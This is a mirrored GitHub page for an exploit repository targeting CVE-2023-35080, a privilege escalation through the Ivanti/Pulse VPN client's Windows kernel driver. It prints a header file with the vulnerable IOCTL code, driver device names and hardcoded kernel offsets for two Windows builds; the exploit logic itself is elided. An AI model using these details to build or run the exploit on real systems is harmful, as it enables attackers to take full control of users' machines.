Git Product home page Git Product logo

ivanti-pulse_vpn-client_exploit-cve-2023-35080_privilege-escalation's Introduction

Ivanti/Pulse VPN Client Exploit of CVE-2023-35080 leading to a privilege escalation

Code related to the exploitation of the CVE-2023-35080 which leverages a write primitive in the Ivanti/Pulse VPN client kernel driver in Windows. The write primitive conducts to a privilege escalation.

The exploit was built with the help of the technical details shared in the following article : https://northwave-cybersecurity.com/ivanti-pulse-vpn-privilege-escalation.

Some details are hardcoded under the main.h file :

#pragma once

#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <winternl.h>


#define VULN_IOCTL  0x80002018

////////

/*
 * jnprTdi_9115_15819 W10
 */

 // #define DEVICE_NAME_W L"jnprTdi_9115_15819"

 // // KxWaitForSpinLockAndAcquire
 // #define SPIN_OFFSET 0x300ea0

 // // KxTryToAcquireSpinLock
 // #define TRY_SPIN_OFFSET 0x361758

 // // void write_char(byte param_1,byte **param_2,int *param_3)
 // #define WRITE_CHAR_OFFSET 0x3d5878

 ////////

 /*
  * jnprTdi_9117_18209 W11
  */

#define DEVICE_NAME_W L"jnprTdi_9117_18209"

  // KxWaitForSpinLockAndAcquire 
#define SPIN_OFFSET 0x300e9e

// KxTryToAcquireSpinLock
#define TRY_SPIN_OFFSET 0x361757

// void write_char(byte param_1,byte **param_2,int *param_3)
#define WRITE_CHAR_OFFSET 0x3d93f8

////////

[...]

ivanti-pulse_vpn-client_exploit-cve-2023-35080_privilege-escalation's People

Contributors

hophouse avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.